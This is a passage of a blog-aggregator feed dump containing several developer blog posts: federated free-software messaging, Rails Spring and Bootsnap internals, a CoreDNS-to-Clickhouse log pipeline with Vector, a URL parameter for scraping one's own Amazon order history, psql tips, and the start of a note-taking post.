into details of what I mean when I say that the users control the software. If the users have the freedom to run, copy, distribute, study, change and improve the software, then the users control the software. Such a software is called free software, where ‘free’ refers to freedom and not to price. In this article, ‘free’ refers to freedom and never to price. I suggest you to read this article to understand why these freedoms are important and how this gives users control over the software. Examples of free software(freedom-respecting) chatting apps are Telegram, Signal, Quicksy, Element etc. If users lack any of these freedoms, then the software is called nonfree\u002Fproprietary and such a software cannot be trusted by the user. WhatsApp is an example of nonfree\u002Fproprietary software.\n Image: Free Software respects your freedom. Source: Richard Stallman's Ted talk slides released under CC-BY 3.0 license. \n\n\nChatting apps usually have two components: 1. The app that you install on your device; 2. A server (we will call it a service provider)which transfers the messages from the sender to the recipient. If you control only the software, the service provider still has the power to impose unjust conditions on you. In the above-mentioned example, Signal is a free software which includes the freedom to modify the code but when a project modified the Signal app code, Signal refused to allow them to connect to their server or federate with any other server. This is not true freedom. So, to control our chatting system, software must be free but that is not enough.\nTherefore, for full control, we need to have federated chat systems – to allow users registered on different service providers to communicate with each other - for instance a mail server run by Google federates with a mail server run by Microsoft when you send email from @gmail.com to @hotmail.com. So you can choose a free software and a trusted, community-run service-provider, and this is what I mean by having control over our communications. This control is collective control by community. Examples of such systems are Matrix and XMPP. Federation answers the question raised earlier: What to do if the service provider imposes terms and conditions you do not agree with? You can switch to another service provider or you can be a service provider and still communicate with your contacts. You don’t need to convince them to switch to a new provider.  Examples of matrix apps are- Element, Nheko, Fluffychat etc. Examples of XMPP apps are- Conversations, Dino, Gajim, Siskin IM etc.  Make sure that the app supports end-to-end encryption–which means only the sender and recipient can read the messages.\n A graphical demonstration of how end-to-end encryption works. Credits: Cryptpad \n\n\nQuicksy app is at the intersection of freedom and convenience. It registers the account with a phone number, which makes the app convenient and easy to use. It federates with XMPP so no one is forced to use Quicksy and so other people can use some other XMPP app(like Conversations) which do not require any personal details to create an account.\nTo get started with XMPP, you can use this guide or use Quicksy app if you don’t mind registering with your phone number.\nTelegram and Signal apps are freedom-respecting but since they are not federated, the overall chatting system is not freedom-respecting.\nAnother way to freedom is to use freedom-respecting encrypted messaging apps which do not involve any servers. These are called peer-to-peer apps. The downside here is that both the users need to be online at the same time to exchange messages. You can choose to run the app in background to receive messages. Examples: Briar, GNU Jami, Tox.\nTL;DR : Free Software app + Federated chat systems like Matrix or XMPP and free software peer-to-peer apps like Briar give users full control over their communications and therefore you can ensure privacy. Nonfree\u002Fproprietary software control the users and therefore cannot be trusted for privacy.\nFurther Reading:\nFSF India’s article on the same.\nIt’s all about choices and control.\nInstant Messaging: It’s not about the app - XMPP provides sovereignty of your communication.\nHow to ensure your Instant Messaging solution offers users privacy and security.",[],{"slug":2066,"title":2067,"link":2068,"pubDate":2069,"contentSnippet":2070,"tags":2071,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"bootsnap-and-spring-understanding-rails-boottime-optimisations-html","Bootsnap and Spring, Understanding rails boottime optimisations","https:\u002F\u002Faboobacker.in\u002F2021\u002F06\u002F28\u002Fbootsnap-and-spring-understanding-rails-boottime-optimisations.html","2021-06-28T08:33:00.000Z","Being the default the gem file entries in a rails project, you may have encountered spring and bootsnap. Here we are going through how they work and how they can improve boot time of your applications and why you get some weird errors in the app(Looking at you Spring).\nBefore diving into details, let’s go through some fundamentals to understand things better. Traditionally there were two kinds of languages, Compiled languages and interpreted languages.  Compiled languages convert the code into binary format and that binary gets executed as the program. C, C++, Java etc are examples for this pattern. Another set of languages which were primarily designed for scripting read individual lines in the code and converted to machine instructions on runtime.\nWith ruby 1.9, a new virtual machine replaced the interpreter in ruby which was called Mat’s Ruby Interpreter(MRI). With a new virtual machine. Here instead of directly executing the code, ruby  code will be converted to an intermediate representation called instruction sequence and the YARV virtual machine will execute them.\nYou can refer to the following diagram for reference.\n\nCredit: Ruby under a microscope\nThere are also bulletin tools to inspect what is happening in the process, let’s check what happens for a 3 line code.\n\nrequire 'ripper'\nrequire 'pp'\ncode = \u003C\u003CCODE\ndef add(x, y)\n  x + y\nend\nCODE\n\n\nLet’s split the code into tokens using ripper utility\n\nirb(main):043:0> Ripper.tokenize code\n=> [\"def\", \" \", \"add\", \"(\", \"x\", \",\", \" \", \"y\", \")\", \"\\n\", \"x\", \" \", \"+\", \" \", \"y\", \"\\n\", \"end\", \"\\n\"]\n\n\nAnd see the parsed form using ripper sexp\n\nirb(main):042:0> pp Ripper.sexp(code)\n[:program,\n [[:def,\n   [:@ident, \"add\", [1, 4]],\n   [:paren,\n    [:params,\n     [[:@ident, \"x\", [1, 8]], [:@ident, \"y\", [1, 11]]],\n     nil,\n     nil,\n     nil,\n     nil,\n     nil,\n     nil]],\n   [:bodystmt,\n    [[:binary,\n      [:var_ref, [:@ident, \"x\", [2, 0]]],\n      :+,\n      [:var_ref, [:@ident, \"y\", [2, 4]]]]],\n    nil,\n    nil,\n\n\nWe can also take look at how the Instruction sequence(yarv code) looks like\n\nirb(main):052:0> puts RubyVM::InstructionSequence.compile(code).disasm\n== disasm: #\u003CISeq:\u003Ccompiled>@\u003Ccompiled>:1 (1,0)-(3,3)> (catch: FALSE)\n0000 definemethod                           :add, add                 (   1)[Li]\n0003 putobject                              :add\n0005 leave\n\n== disasm: #\u003CISeq:add@\u003Ccompiled>:1 (1,0)-(3,3)> (catch: FALSE)\nlocal table (size: 2, argc: 2 [opts: 0, rest: -1, post: 0, block: -1, kw: -1@-1, kwrest: -1])\n[ 2] x@0\u003CArg>   [ 1] y@1\u003CArg>\n0000 getlocal_WC_0                          x@0                       (   2)[LiCa]\n0002 getlocal_WC_0                          y@1\n0004 opt_plus                               \u003Ccalldata!mid:+, argc:1, ARGS_SIMPLE>\n0006 leave                                                            (   3)[Re]\n=> nil\n\n\nExplaining the terms in the parsed and compiled code is beyond the scope of this blog post, and I recommend reading Ruby Under a Microscope.\nNewer versions of ruby also allows us to compile the code to binary and execute them later. it is experimental and platform dependent.\n\n? cat example.rb\nnumber = 23\nputs number + 23\n? ruby -e \"File.write('example.bin',RubyVM::InstructionSequence.compile_file('example.rb')\n.to_binary)\"\n? cat example.bin\nYARB@\n     ?x86_64-darwin18%?#?%?gw\nnumberE+Eexampleputs?????????%\n\n\n\nirb(main):018:0>  RubyVM::InstructionSequence.load_from_binary(File.read('example.bin')).eval\n46\n\n\nThat is it for the ruby compilation process for now. Now let’s how the ruby’s require method works.\nContrary to what I thought initially, require is not a keyword in ruby, it is a method from ruby’s Kernal module.\nLet’s look at the overly simplified version of require method for our context.\n\ndef require(file_name)\n  eval File.read(filename)\nend\n\n\nTwo main issues with this implementation are\nRequiring same file again will load the file again\nOnly absolute paths are supported\nWe can fix these issues in the following ways\n\n  $LOADED_FEATURES = []\n  def require(filename)\n    return false if $LOADED_FEATURES.include?(filename)\n    eval File.read(filename)\n    $LOADED_FEATURES \u003C\u003C filename\n  end\n\n\n\n  $LOAD_PATH = []\n  #$LOAD_PATH = += gems_path + stdlib path + application code paths\n\n  def require(filename)\n    full_path = $LOAD_PATH.take do |path|\n      File.exist?(File.join(path, filename))\n    end\n\n    eval File.read(full_path)\n  end\n\n\nWhile above code snippets are dummy implementations, Ruby actually uses the constants $LOADED_FEATURES and $LOAD_PATH for the same use case. Here is a stat from one of our  app for reference\n\nirb(main):054:0>  $LOADED_FEATURES.count\n=> 6552\n\n\n\nirb(main):058:0> $LOAD_PATH.count\n=> 779\n\n\nAnother important method we need to recall is the fork system call in POSIX systems. fork allows the OS to create a new process as the child process with the same  memory space. Modern hardware architectures like x86 allows the OS to optimise the fork with a mechanism called copy on write. In short it is very cheap to create a forked process of an app than loading that app from scratch.\nNow let’s look at the gems from the title.\nSpring is a rails only tool to speedup development and test environments. It creates your app process in the background for development and test environments and acts as a server. When you run a process like bundle exec rails server or bundle exec rspec it sends the data like command, ENV values, arguments etc to spring server, and spring server will fork the server process and run the task.\nSince the server process already loaded the app, the loading time of the app will be negligible and your task will run faster.\nBut when the code changes, the server process needs to update and it may fail due to various reasons, like adding new directories. That is why you ended up having to run spring stop manually or restart the system to make the application behave as expected.\nThe serve method in Spring is provided as reference. You can see zipping io values, fetching arguments, env etc from client, forking the new process etc in the below snippet.\n\n def serve(client)\n      log \"got client\"\n      manager.puts\n\n      _stdout, stderr, _stdin = streams = 3.times.map { client.recv_io }\n      [STDOUT, STDERR, STDIN].zip(streams).each { |a, b| a.reopen(b) }\n\n      preload unless preloaded?\n\n      args, env = JSON.load(client.read(client.gets.to_i)).values_at(\"args\", \"env\")\n      command   = Spring.command(args.shift)\n\n      connect_database\n      setup command\n\n      if Rails.application.reloaders.any?(&:updated?)\n        Rails.application.reloader.reload!\n      end\n\n      pid = fork {\n        Process.setsid\n        IGNORE_SIGNALS.each { |sig| trap(sig, \"DEFAULT\") }\n        trap(\"TERM\", \"DEFAULT\")\n\n        unless Spring.quiet\n          STDERR.puts \"Running via Spring preloader in process #{Process.pid}\"\n\n          if Rails.env.production?\n            STDERR.puts \"WARNING: Spring is running in production. To fix \"         \\\n                        \"this make sure the spring gem is only present \"            \\\n                        \"in `development` and `test` groups in your Gemfile \"       \\\n                        \"and make sure you always use \"                             \\\n                        \"`bundle install --without development test` in production\"\n          end\n        end\n\n        ARGV.replace(args)\n        $0 = command.exec_name\n\n        # Delete all env vars which are unchanged from before Spring started\n        original_env.each { |k, v| ENV.delete k if ENV[k] == v }\n\n        # Load in the current env vars, except those which *were* changed when Spring started\n        env.each { |k, v| ENV[k] ||= v }\n\n        # requiring is faster, so if config.cache_classes was true in\n        # the environment's config file, then we can respect that from\n        # here on as we no longer need constant reloading.\n        if @original_cache_classes\n          ActiveSupport::Dependencies.mechanism = :require\n          Rails.application.config.cache_classes = true\n        end\n\n        connect_database\n        srand\n\n        invoke_after_fork_callbacks\n        shush_backtraces\n\n        command.call\n      }\n\n      disconnect_database\n\n      log \"forked #{pid}\"\n      manager.puts pid\n\n      wait pid, streams, client\n    rescue Exception => e\n      log \"exception: #{e}\"\n      manager.puts unless pid\n\n      if streams && !e.is_a?(SystemExit)\n        print_exception(stderr, e)\n        streams.each(&:close)\n      end\n\n      client.puts(1) if pid\n      client.close\n    ensure\n      # Redirect STDOUT and STDERR to prevent from keeping the original FDs\n      # (i.e. to prevent `spring rake -T | grep db` from hanging forever),\n      # even when exception is raised before forking (i.e. preloading).\n      reset_streams\n    end\n\n\nBootsnap is a gem released by shopify by extracting boot time improvements they made in their app. We can categorise them into two parts\nPath prescanning\nKernel#require and Kernel#load are modified to eliminate $LOAD_PATH scans\nActiveSupport::Dependencies.{autoloadable_module?,load_missing_constant,depend_on} are overridden to eliminate scans of ActiveSupport::Dependencies.autoload_paths.\nCompilation Caching\nRubyVM::InstructionSequence.load_iseq is implemented to cache the result of Ruby bytecode compilation\nYAML.load_file is modified to cache the result of loading a YAML object in MessagePack format (or Marshal, if the message uses types unsupported by MessagePack)\nIf you look at the pseudo code above to demonstrate the LOAD_PATH behaviour, you will see that we need to check file existence every time we do a require, which is an io operation and not very cheap to perform. What if we can do something like this?\n\n def require(filename)\n    if $CACHED_PATH[file_name]\n      full_path = $CACHED_PATH[filename]\n    else\n      full_path = $LOAD_PATH.take do |path|\n        File.exist?(File.join(path, filename))\n      end\n    end\n\n    eval File.read(full_path)\n end\n\n\nload path for a library is not something that changes very often, especially for gem paths and standard library paths, bootsnap caches them to save redundant file checks. Not that cache duration and expiration vary with files, so caching them in a constant won’t work. CACHED_PATH is just for reference and not used by the gem.\nAnother important optimization by bootsnap is the compilation cache. We covered the ruby compilation process in the beginning and saw that every single file needed to go through the compilation process every single time they got called. Bootsnap addresses this by caching yarv code(instruction sequence) and compiling the code only if the code changes.\nThere are also other optimised YAML loading by caching in an optimised format. overall Bootsnap gives impressive benefits as it works on production as well. We got about 30% reduction in boottime for our production ecommerce app.\nNote: This was originaly presented in internal tech talk in Sephora and made some tweaks to the content for wider audience.",[],{"slug":2073,"title":2074,"link":2075,"pubDate":2076,"contentSnippet":2077,"tags":2078,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"coredns-vector-clickhouse","Analyzing CoreDNS logs with Clickhouse and Vector","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fcoredns-vector-clickhouse\u002F","2021-06-04T18:30:00.000Z","I’ve been toying around Clickhouse and Vector at my day job and find both of these tools pretty interesting at what they do. A short summary for those unaware of these tools:\nVector helps you build a pipeline for collecting, transforming and processing different kinds of observability data (logs and metrics).\nClickhouse is a columnar based DB used as a warehousing tool for generating reports and analytics.\nNow, for the context, I use coredns on my personal dev machine as it supports Split DNS (routing certain zones to a particular resolver) which I need for accessing internal domains at work. Yep, systemd-resolved can also do this, but I find coredns easier to configure and manage with OpenVPN as well.\nAnyway, so one random evening, I got the idea of dumping CoreDNS Logs to Clickhouse. Maaaybe I was still hungover from the Vector\u002FClickhouse work I was doing at work but nevertheless I was interested in it.\nOverview#\nGather logs from CoreDNS.\nTransform the logs with regex and construct a payload for Clickhouse.\nWrite a schema for the logs table.\nDump to Clickhouse.\nHere’s how the pipeline looks:\n\nCollecting Logs#\nFirst, let’s look at how the raw logs are structured by CoreDNS:\n[INFO] 127.0.0.1:55678 - 21963 \"A IN xpui.app.spotify.com. udp 38 false 512\" NXDOMAIN qr,rd,ra 121 0.061416978s\n[INFO] 127.0.0.1:59333 - 22742 \"AAAA IN incoming.telemetry.mozilla.org. udp 48 false 512\" NOERROR qr,aa,rd,ra 106 0.049235139s\n[INFO] 127.0.0.1:39609 - 47247 \"AAAA IN ping.archlinux.org. udp 36 false 512\" NOERROR qr,rd,ra 140 0.056721154s\nVector provides a variety of sources to collect these logs. Since I am running coredns as a Docker container, the following config shows how to collect logs from a particular container:\n# Filter coredns logs from Docker logs\n[sources.coredns_logs]\n  type = \"docker_logs\" # required\n  docker_host = \"unix:\u002F\u002F\u002Fvar\u002Frun\u002Fdocker.sock\"\n  include_images = [\"coredns\u002Fcoredns\"] # optional, no default\nThe above config basically specifies a Docker Host variable and an image name filter. Vector talks to the Docker API over a unix socket and gathers metadata about the container (like container_created_at, container_name, label etc).\nAfter collecting logs from Vector, it enriches with the following metadata.\n{\n    \"container_created_at\": \"2021-06-04T14:18:03.967143133Z\",\n    \"container_id\": \"00c5c4d36ea5b4772b517d3cca7d397c92f72be2a2bf45bb8c430f717fbd331e\",\n    \"container_name\": \"coredns_coredns_1\",\n    \"host\": \"iris\",\n    \"image\": \"coredns\u002Fcoredns\",\n    \"label\": {\n        \"com.docker.compose.config-hash\": \"928d71143c2af6553d551dbbf14140304d53f92378746454fbfeb0382a896d5b\",\n        \"com.docker.compose.container-number\": \"1\",\n        \"com.docker.compose.oneoff\": \"False\",\n        \"com.docker.compose.project\": \"coredns\",\n        \"com.docker.compose.project.config_files\": \"\u002Fhome\u002Fkaran\u002FCode\u002FInfra\u002Fcoredns\u002Fhydra-vpn-compose.yml\",\n        \"com.docker.compose.project.working_dir\": \"\u002Fhome\u002Fkaran\u002FCode\u002FInfra\u002Fcoredns\",\n        \"com.docker.compose.service\": \"coredns\",\n        \"com.docker.compose.version\": \"1.29.2\"\n    },\n    \"message\": \"[INFO] 127.0.0.1:38266 - 20341 \\\"A IN open.spotify.com. udp 34 false 512\\\" NOERROR qr,rd,ra 160 0.300268123s\",\n    \"source_type\": \"docker\",\n    \"stream\": \"stdout\",\n    \"timestamp\": \"2021-06-04T16:13:07.454601872Z\"\n}\n(NOTE: I am using console sink to dump these logs to STDOUT. It’s pretty handy for inspecting logs).\n# Print parsed logs to stdout\n[sinks.print]\ntype = \"console\"\ninputs = [\"coredns_logs\"]\nencoding.codec = \"json\"\nAs you can see from the above JSON object, Vector has transformed the log with its own Data Model. The log that we care about now is inside .message key. It’s nice to have other metadata as well.\nTransforming the logs#\nOur objectives at this step:\nDiscard unused fields. We don’t really care about container metadata for this mini-project.\nParse the message field with regex so they can be stored in individual columns in our Clickhouse table.\nNow, CoreDNS can emit two kinds of logs (INFO and ERROR). The error usually happens when the upstream resolver is unreachable or there’s an issue with any of the CoreDNS plugins.\nWe need to write regex for both cases:\nINFO logs:\n\\[(?P\u003Clevel>[^]]+)]\\s(?P\u003Cserver_addr>[^:]+):(?P\u003Cserver_port>\\S+)\\s+-\\s+(?P\u003Cid>\\S+)\\s+(?P\u003Ctype>\\S+)\\s+(?P\u003Cclass>\\S+)\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Cproto>\\S+)\\s+(?P\u003Csize>\\S+)\\s+(?P\u003Cdo>\\S+)\\s+(?P\u003Cbufsize>[^\"]+)\"\\s+(?P\u003Crcode>\\S+)\\s+(?P\u003Crflags>\\S+)\\s+(?P\u003Crsize>\\S+)\\s+(?P\u003Cduration>[\\d\\.]+).*\n\nERROR logs:\n\\[(?P\u003Clevel>ERROR)]\\s+(?P\u003Ccomponent>plugin\\\u002Ferrors):\\s+(?P\u003Ccode>\\S)+\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Ctype>[^:]*):\\s+(?P\u003Cerror_msg>.*)\n\nCombining a bunch of other things to remove some fields and constructing the final payload, the config looks like this:\n\n# Parse coredns logs\n[transforms.parse_logs]\ntype = \"remap\"\ninputs = [\"coredns_logs\"]\nsource = '''\n# parse the log event.\nts = .timestamp\nlog,err = parse_regex(.message,r'\\[(?P\u003Clevel>[^]]+)]\\s(?P\u003Cserver_addr>[^:]+):(?P\u003Cserver_port>\\S+)\\s+-\\s+(?P\u003Cid>\\S+)\\s+\"(?P\u003Ctype>\\S+)\\s+(?P\u003Cclass>\\S+)\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Cproto>\\S+)\\s+(?P\u003Csize>\\S+)\\s+(?P\u003Cdo>\\S+)\\s+(?P\u003Cbufsize>[^\"]+)\"\\s+(?P\u003Crcode>\\S+)\\s+(?P\u003Crflags>\\S+)\\s+(?P\u003Crsize>\\S+)\\s+(?P\u003Cduration>[\\d\\.]+).*')\nif err !=null {\n    # capture the error log. If the error log also fails to get parsed, the log event is dropped.\n  log = parse_regex!(.message,r'\\[(?P\u003Clevel>ERROR)]\\s+(?P\u003Ccomponent>plugin\u002Ferrors):\\s+(?P\u003Ccode>\\S)+\\s+(?P\u003Cname>\\S+)\\s+(?P\u003Ctype>[^:]*):\\s+(?P\u003Cerror_msg>.*)')\n}\n. = log\n# add timestamp\n.timestamp = ts\n# remove fields we dont care about\ndel(.do)\n'''\ndrop_on_error = true\nApart from regex matching, we store the timestamp as received from Vector (since CoreDNS logs don’t contain any timestamp information). We delete some fields that we don’t care about.\nVector uses a powerful DSL (called VRL) to do such kind of transformations on the fly. It has a lot of functions to do almost any kind of transformation to your original event payload. You can invoke vector vrl from the terminal and get a shell to write the above transformations and debug quickly. It proved to be really useful when dealing with such a long regex pattern.\nStoring in Clickhouse#\nFinally we get to the part where we need to dump these logs to our Clickhouse DB. Here’s the schema for the table where we will be storing these records:\nCREATE DATABASE IF NOT EXISTS `coredns`;\n\nCREATE TABLE IF NOT EXISTS `coredns`.`logs` (\n    `timestamp` DateTime('Asia\u002FKolkata'),\n    `bufsize` Int32,\n    `class` LowCardinality(String),\n    `duration` Float64,\n    `id` Int32,\n    `level` LowCardinality(String),\n    `name` String,\n    `proto` LowCardinality(String),\n    `rcode` LowCardinality(String),\n    `rflags` String,\n    `server_addr` String,\n    `server_port` Int32,\n    `rsize` Int32,\n    `size`  Int32,\n    `type` LowCardinality(String)\n) ENGINE = MergeTree()\nPARTITION BY toYYYYMM(timestamp)\nORDER BY toYYYYMMDD(timestamp)\nTTL timestamp + INTERVAL 1 WEEK;\nKey things to note:\nLowCardinality is used for columns where the data is predictable to reduce the disk space used.\nClickhouse uses the sort key as the primary key if unspecified. This is the default behaviour.\nTTL for the records is set to 1 week. After 1 week all the records will be purged. Since this is my dev machine, I don’t really care about a higher TTL.\nThis also means that the partition is never really put to use since I am partitioning by month but logs are being deleted every week. At this scale, it doesn’t really make sense to even have it, but I just included it for posterity.\nUPDATE:\nClickhouse on Twitter clarified that ORDER BY timestamp will have better performance in this context. Usually if your queries are “last 1h”, “last 5m” based, it is better to not store the the sort key as YYYYMMDD format.\n\nNow, we need to instruct Vector to send these logs to Clickhouse:\n\n[sinks.coredns_logs_clickhouse_output]\n  type = \"clickhouse\"\n  inputs = [\"parse_logs\"]\n  compression = \"gzip\"\n  database = \"coredns\"\n  endpoint = \"http:\u002F\u002Flocalhost:8123\"\n  table = \"logs\"\n  encoding.timestamp_format = \"unix\"\n  batch.timeout_secs = 10\nClickhouse offers an HTTP API (which is running on port 8123 by default). Vector takes the input from the previous step (parse_logs transformation) and sends it to Clickhouse over the HTTP interface. Clickhouse stores datetimes in UNIX, so before sending the data, Vector can encode certain fields in the payload to a different data type as well (isn’t that cool 😎)\nQuery Examples#\nI’ve been running this pipeline for 3-4 days, so I have a decent amount of data collected to show for the blog post.\nTotal Count of Queries\nSELECT count(*)\nFROM coredns.logs\n\n┌─count()─┐\n│   16774 │\n└─────────┘\n\n\nTop Query Types\nSELECT\n    count(*) AS total,\n    type\nFROM coredns.logs\nGROUP BY type\nORDER BY total DESC\nLIMIT 5\n\n┌─total─┬─type─┐\n│  9931 │ A    │\n│  6852 │ AAAA │\n└───────┴──────┘\n\n\nTop Query Names\nSELECT\n    count(*) AS total,\n    name\nFROM coredns.logs\nGROUP BY name\nORDER BY total DESC\nLIMIT 5\n\n┌─total─┬─name────────────────────────────┐\n│  2513 │ ping.archlinux.org.             │\n│  1868 │ ws.todoist.com.                 │\n│  1011 │ incoming.telemetry.mozilla.org. │\n│   802 │ vortex.data.microsoft.com.      │\n│   707 │ logs-01.loggly.com.             │\n└───────┴─────────────────────────────────┘\n\n\nMax\u002FMin duration\nSELECT\n    max(duration) AS max,\n    min(duration) AS min\nFROM coredns.logs\nFORMAT Vertical\n\nRow 1:\n──────\nmax: 4.056606352\nmin: 0.000020837\n\n\nTop TLDs Queried\nSELECT\n    count(name) AS total,\n    topLevelDomain(substring(name, 1, -1)) AS tld\nFROM coredns.logs\nGROUP BY tld\nORDER BY total DESC\nLIMIT 10\n\n┌─total─┬─tld──┐\n│ 10666 │ com  │\n│  3950 │ org  │\n│   671 │ net  │\n│   346 │ so   │\n│   288 │ tech │\n│   279 │ io   │\n│   190 │ co   │\n│   167 │ dev  │\n│    82 │ arpa │\n│    43 │ in   │\n└───────┴──────┘\n\n\nWell, that’s all I could think of really. If you’ve some more interesting analysis to get from this data, let me know!\nSummary#\nThe intention behind writing this post is to give an overview of how the entire log collection and processing pipeline works. Using Vector has been an amazing experience however the sad bit is that I don’t know Rust and I cannot contribute to some of the issues I’ve opened (even though they are presumably trivial). Maybe I should pick up Rust, finally? 🤭\nThanks for reading!",[],{"slug":2080,"title":2081,"link":2082,"pubDate":2083,"contentSnippet":2084,"tags":2085,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"amazon-website-order-drm","Amazon Order History Encryption Bypass","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2021\u002F05\u002F14\u002Famazon-website-order-drm\u002F","2021-05-14T00:00:00.000Z","The Amazon US website allows you to export your Order History easily by visiting the “Order History Reports” page. No such option seems to exist for the Amazon websites for other countries. I was trying to write a simple scraper for the Amazon India Order History Page to get the same data, and discovered something interesting: Amazon encrypts the Order history page, and decrypts it using client side cryptography1. If you were to visit the page, and check the response HTML, you’d see something like this in the source code (fairly simplified):\n\n\u002F\u002F Define encrypted content in JS\nvar payload = {\n  \"kid\": \"b70014\",\n  \"iv\": \"\u002FHenfXwYrGrrw8ff\",\n  \"ct\": \"Wt78pPcibe8HAdVtoJ8+E9EGwt4IQYNghBMubBy7Zy\u002F...\"\n}\n\u002F\u002F The HTML div to be populated with the decrypted HTML\nvar elementId = \"csd-encrypted-889C1D02..\";\n\u002F\u002F if client side decryption library failed to load\nif (!window.SiegeClientSideDecryption) {\n  window.location.href = \"?disableCsd=missing-library\";\n  return;\n}\n\u002F\u002F Decrypt and populate the div\nSiegeClientSideDecryption.decryptInElementWithId(\n  elementId, payload, {callSource: \"now\"}\n);\n\n\nThe easiest way to scrape with such hurdles is often to just run a complete browser to scrape the site. The browser runs the javascript code with the decryption routine so you can scrape the actual content. However, it is much slower, and wastes CPU cycles - I try to avoid it if I can.\n\n    Aside: Click here for explanation of the decryption code\n    \nThe server sends some HTML encrypted as a JSON payload (ct is truncated ciphertext in the snippet above), along with the IV and a Key ID. The SiegeClientSideDecryption library is then called to decrypt the payload and set the plaintext result as inner HTML of the elementID. The code redirects to a different URL in case the decryption library fails to load.\n\n\nI could have spent time to parse the encryption routine, extract the key and decrypt the payload. But I found a much simpler solution - Amazon offers an alternate URL which disables encryption. As a fallback, in case the decryption code fails, it adds a query parameter ?disableCsd=missing-library. That disables the server side encryption entirely.\nSo if you’re trying to scrape Amazon and stumped at the missing order history in the HTML, try visiting the following URLs instead:\nhttps:\u002F\u002Fwww.amazon.in\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nhttps:\u002F\u002Fwww.amazon.co.uk\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nhttps:\u002F\u002Fwww.amazon.com\u002Fgp\u002Fcss\u002Forder-history?disableCsd=missing-library\nAmazon also sets a cookie csd-key=disabled but I didn’t experiment with that much.\nRequest My Data\nAnother alternative to scraping is to request Amazon for your data. Check the Retail.OrderHistory CSV files in the data export. The export from amazon.com includes data for other countries as well. The feature is also available on other Amazon sites:\nAmazon US - Request My Data\nAmazon India - Request My Data\nAmazon UK - Request My Data\nAmazon Germany - Request My Data\nI’m hesitant to call this DRM, but it might qualify as such. ↩",[],{"slug":2087,"title":2088,"link":2089,"pubDate":2090,"contentSnippet":2091,"tags":2092,"maintainerName":1639,"maintainerUsername":1640,"maintainerPhoto":77,"feedUrl":1641},"intermediate-postgresql-for-rails-developers-part-0-get-your-enviornoments-ready-html","Intermediate Postgresql for rails developers, Part 0: Get your environment","https:\u002F\u002Faboobacker.in\u002F2021\u002F04\u002F30\u002Fintermediate-postgresql-for-rails-developers-part-0-get-your-enviornoments-ready.html","2021-04-30T17:42:00.000Z","Postgresql is one of the most advanced open source database available in the market. Adherence to the SQL standards and super cool extra features are few of the reason by Postgres being the most popular database among rails community. This is neither introduction to Postgres nor rails. This series is for the folks who have been using rails and Postgres for one or more years.\nIn part 0 we will walk through the tips for postgres setup to increase the productivity.\nActiveRecord orm which is built into rails provides a lot of cool methods to access the data in rubyistic way. But it is important to get familiarize with the native Postgres tooling for many tasks.\nPsql\nPsql is the official commandline client for postgresql, rails does have shortcut to open psql using the configuration from database configuration as rails dbconsole. But you can also open by using psql command on your command line client.\npsql -h localhost -U username databasename\nAbove is the basic syntax for opening psql console, Once you enter that you will be greeted with psql console if the credentials given are correct.\nNow let’s go through few psql tips\nBackward slash commands\npsql supports a lot of useful configuration options to improve the experiance in postgresql shell.\n\\timing\nTiming command add the time taken to run the command, this is handy when optimizing query performance\n\n[local] abomk@cv_dump=#SELECT COUNT(id) from users;\n? 45129 ?\n?????????\n\n[local] abomk@cv_dump=#\\timing\nTiming is on.\n[local] abomk@cv_dump=#SELECT COUNT(id) from users;\n? 45129 ?\n?????????\n\nTime: 8.412 ms\n\n\n\\s\nGet posgtres commands history, this is handy for documenting the stuff after doing experiments with different queries and many more. You can also choose to save the history by providing filename as the parameter as \\s filename\n\\i filename\nLoad query from file. Big queries are often convent to write in a text editor, \\i enables loading a query from a file and execute it.\n\\e\nThis another approach to solve the difficulty of writing multi line queries in a shell environment, When you give \\e command, psql will open the text editor you set $EDITOR to open the query. You can edit and close the file, content will be copied to posql shell, and you can execute.\nYou can find more such commands from posgrestutorials and pgdash\nManaging multiple versions of postgres\nIt is important to have the same version of postgres in your development setup as the production version. If you have multiple apps with diffrent versions of postgres versions, you can use pgenv to configure multiple versions of Postgres in your local. There are other options like asdf-postgres\nUse different pager\nThe default pager is somewhat difficult to read when there are too many columns. pspg is an alternate pager you can use with Postgres\nSave your psql settings in your psqlrc\nYou can save the psql configurations we discussed above in a file so that you don’t need to repeat every time you open the psql shell. Here is my psql configuration for reference\n\\set ON_ERROR_ROLLBACK interactive\n\\set COMP_KEYWORD_CASE upper\n\\set HISTFILE ~\u002F.psql\u002Fhistory- :DBNAME\n\\set VERBOSITY verbose\n\\set PROMPT1 '%[%033[1m%]%M %n@%\u002F%R%[%033[0m%]%#'\n\\setenv PAGER pspg\n\\pset border 2\n\\pset linestyle unicode\n\\set null '(null)'\n\nYou can find explanation of individual configurations from thoughtbot blog\nPgcli\nPgcli is an alternate postgresql client with additional features like autocompletion of table and sql queries.\nWe will go through more tips in coming articles, while it is not mandatory to follow the above setup for cominig articles, it is good to have to get hands on with psql shell",[],{"slug":2094,"title":2095,"link":2096,"pubDate":2097,"contentSnippet":2098,"tags":2099,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"how-i-take-notes","How I take Notes","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fhow-i-take-notes\u002F","2021-04-14T02:40:55.000Z","Over the past 2-3 years, note-taking apps have become all the rage. Note-taking is an extremely subjective topic and a lot of it depends on the individual’s workflow. There’s no one size fits all and maybe that justifies the ever-expanding landscape of such apps. I’ve tried a few popular ones (Notion, Roam Research) in the recent past but never really quite stuck to any after the initial hype phase.\nI even collaborated with @iamd3vil to make our own version of the Zettelkasten based note-taking app. I found the Zettelkasten system to be really useful on paper but then again, I didn’t use it after a few weeks.\nTried the old school way of Bullet Journal (and I did end up liking it quite a lot) but it was not so practical in many cases (like documenting code snippets, URLs etc).\nDisgruntled with all the options, I just had a simple folder on my laptop with some markdown files in it. It was a stop-gap solution until I found something better.\nTL;DR: I’ve been through a pendulum phase of finding a new note-taking app, wasting time to set it up the “proper way” and then just end up not using it.\nEnter Joplin#\n\nThanks to 